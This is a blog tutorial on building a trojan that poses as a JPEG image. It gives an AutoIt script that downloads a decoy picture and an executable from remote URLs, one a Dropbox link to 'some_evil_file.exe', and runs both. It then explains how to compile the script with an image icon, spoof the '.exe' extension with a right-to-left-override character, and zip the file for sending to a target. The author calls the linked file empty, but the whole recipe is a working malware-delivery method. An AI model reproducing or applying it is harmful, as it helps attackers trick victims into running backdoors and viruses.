A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
Trojan malware, when opened appears to be a legitimate file opened by the user like opening an image or a document or playing a media file, but in the background, it will run some evil process like someone may be gaining access to your computer through a backdoor or injecting some other harmful code.
In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my
.exe file in a
.jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
.exe the executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on dropbox for this purpose. In the case of dropbox, modifying the end part of the sharable link to
dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the
URL for my image:
I have used the image of the sports complex as a cover.
#include <StaticConstants.au3> #include <WindowsConstants.au3> Local $urls = "url1,url2" Local $urlsArray = StringSplit($urls, ",", 2 ) For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile) Next Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
In the above code, in line number 3, replace
url1 with the URL of the image and
url2 with the URL of the executable file. My final code looks like this
#include <StaticConstants.au3> #include <WindowsConstants.au3> Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1" Local $urlsArray = StringSplit($urls, ",", 2 ) For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile) Next Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
Save the file with an extension
.au3 . I have named the file trojan
Since I am using an image as a cover file,
Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to
.ico format. You can google for it and you will find a number of tools to do it. I used this website for it - https://cloudconvert.com/jpg-to-ico
The script is written in a scripting language called
AutoIt. To install
AutoIt in Ubuntu, you can install
wine and install
AutoIt , or if you want a straightforward way, install
Veil from the steps mentioned here https://www.javatpoint.com/installing-veil.
AutoIt will be installed in one of the steps after which you can exit the installation.
Open the Compile
AutoIt app. The window should look something like the box shown below. Enter the location of the
trojan.au3 file and the path of the .ico file.
The converted file looks like this on a windows machine.
Well, something’s not right. The problem with this file is its extension. It is obvious that is an executable since its extension is
.exe . We need to spoof this extension.
To spoof the obvious extension
.exe and replace it with
.jpeg , we will use a
To know about the detail of how spoofing actually works and where to place the
right-to-left-override character, read the blog. Spoofing File Extensions
To summarise the steps mentioned in the above blog:
right-to-left-overridecharacter at the 7th position after trojan. All the characters after the
right-to-left-overridethe character will be flipped i.e read right to left.
The filename now looks like
Since the image contained in the file is of a sports complex I will replace
trojan in the name with
sportscompl_ so that the file name reads
Congrats!!! Your trojan is ready.
Now the filename matches with the image contained. Some recent browsers remove the right-to-left-override before downloading. So it is a good idea to zip the file and send it over.